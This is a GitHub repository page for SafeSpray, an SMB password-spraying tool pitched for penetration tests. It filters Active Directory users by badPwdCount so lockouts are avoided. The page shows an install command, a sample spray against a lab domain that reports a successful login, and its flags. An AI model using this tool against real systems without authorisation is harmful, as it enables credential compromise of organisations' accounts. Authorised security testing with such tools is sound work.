Skip to content
/ SafeSpray Public

An smb login password spray tool that prevents account lockouts by filtering all non-zero badPwdCount users

License

MIT license
1 star 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

deadjakk/SafeSpray

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

SafeSpray

A simple smb login password spraying tool written in go that aims to prevent account lockouts.
The difference between this tool and others is that it will only perform password spraying on accounts that meet the following criteria:

  1. has a badpwdcount equal to 0
  2. has a username that is present in the provided userlist flag
  3. does not end in $ (computer accounts usually though this should not ever be hit since it only queries user objects)
  4. is not an account in ignoreArray (see isIgnorable function)

Also, to get this information it will query all ldap users at the time the password spray is performed, therefore a valid user account is needed (in most environments).

Obviously this will not be applicable to all types of engagements, but it should work great on internal (non-stealth) pentesting engagements.

This way you really shouldn't need to worry about the password policy as long as it allows more than 1 failed login attempt.

All this said, test it on your own first, I am not responsible for account lockouts.

To install

go install github.com/deadjakk/safespray@latest

To Use

jakk@tele ~/spaf $ ./safespray -domain sprawl.local.shell.rip -password Password1 -spraypassword Password1 -userlist users.txt -username administrator -verbose
SKIPPED account (reason: not present in user list): Administrator
ADDED account: carnivore
loaded 1 users
SUCCESS - [email protected] with password Password1

Example usage

Usage of ./safespray:
  -authdomain string
    	(optional) valid domain to query ldap (if different from target domain)
  -dcip string
    	(optional) ip of the domain controller, optional, if excluded domain will be used as target instead
  -domain string
    	target domain name to authenticate and spray against
  -dryrun
    	(optional RECOMMENDED) will load the users and do nothing else. good to see what accounts will be run against
  -password string
    	valid password to query ldap
  -spraypassword string
    	password to spray
  -userlist string
    	path to the user file
  -username string
    	valid username to query ldap
  -verbose
    	(optional) enable verbose output

Note: These were both run in quick succession, and because the test account failed to authenticate on the first run, it was omitted from the second run due to the updated badPwdCount.
image

About

An smb login password spray tool that prevents account lockouts by filtering all non-zero badPwdCount users

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

2 forks
Report repository

Releases

3 tags

Packages

No packages published

Languages